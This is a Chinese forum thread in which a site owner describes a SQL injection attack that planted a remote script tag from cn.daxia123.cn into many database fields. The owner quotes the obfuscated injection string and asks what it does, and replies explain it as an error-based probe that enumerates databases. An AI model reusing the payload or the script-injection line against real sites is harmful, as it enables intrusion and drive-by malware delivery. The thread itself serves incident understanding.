22,294
社区成员
发帖
与我相关
我的任务
分享这段代码什么意思呢?
今天网站被SQL注入了 忙了一天...清掉后又出现..一次比一次更离谱 受影响的表和字段越来越多,都是插入<script src=http://cn.daxia123.cn/cn.js></script>
后加了些防注入措施,暂时没问题了...顺便也记录了对方的操作记录,不定时的攻击,每次1个IP攻击3次,隔段时间换个IP再攻击3次,,,至今记录的数个IP都是韩国的,不过可能不是源头 哎
例如http://www.xxx.com/a.asp?id=4
对方把ID值换成了194%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='
红色这段代码要怎么理解?怎么就能在那么多字段里随意插入数据呢?
后加了些防注入措施,暂时没问题了...顺便也记录了对方的操作记录,不定时的攻击,每次1个IP攻击3次,隔段时间换个IP再攻击3次,,,至今记录的数个IP都是韩国的,不过可能不是源头 哎
例如http://www.xxx.com/a.asp?id=4
对方把ID值换成了194%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='
红色这段代码要怎么理解?怎么就能在那么多字段里随意插入数据呢?
...全文
请发表友善的回复…
发表回复
木头是猫 2008-12-29
- 打赏
- 举报
[Quote=引用 4 楼 butchroller 的回复:]
这只是试探攻击的一部分。
红色部分将产生错误信息,可借此取得服务器上有几个数据库。
[/Quote]
那都会有哪些常用的方法进行update数据呢
这只是试探攻击的一部分。
红色部分将产生错误信息,可借此取得服务器上有几个数据库。
[/Quote]
那都会有哪些常用的方法进行update数据呢
butchroller 2008-12-28
- 打赏
- 举报
这只是试探攻击的一部分。
红色部分将产生错误信息,可借此取得服务器上有几个数据库。
红色部分将产生错误信息,可借此取得服务器上有几个数据库。
木头是猫 2008-12-28
- 打赏
- 举报
有人能给我解释下不
这代码怎么就能在那么多字段里随意插入数据呢?
这代码怎么就能在那么多字段里随意插入数据呢?
nalnait 2008-12-27
- 打赏
- 举报
你把红色的部分自己可以翻译下,大概是:
'and (select cast(count(1) as varchar(100)) from master..sysdatabases)>0 and '%'='
木头是猫 2008-12-27
- 打赏
- 举报
194%' AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='
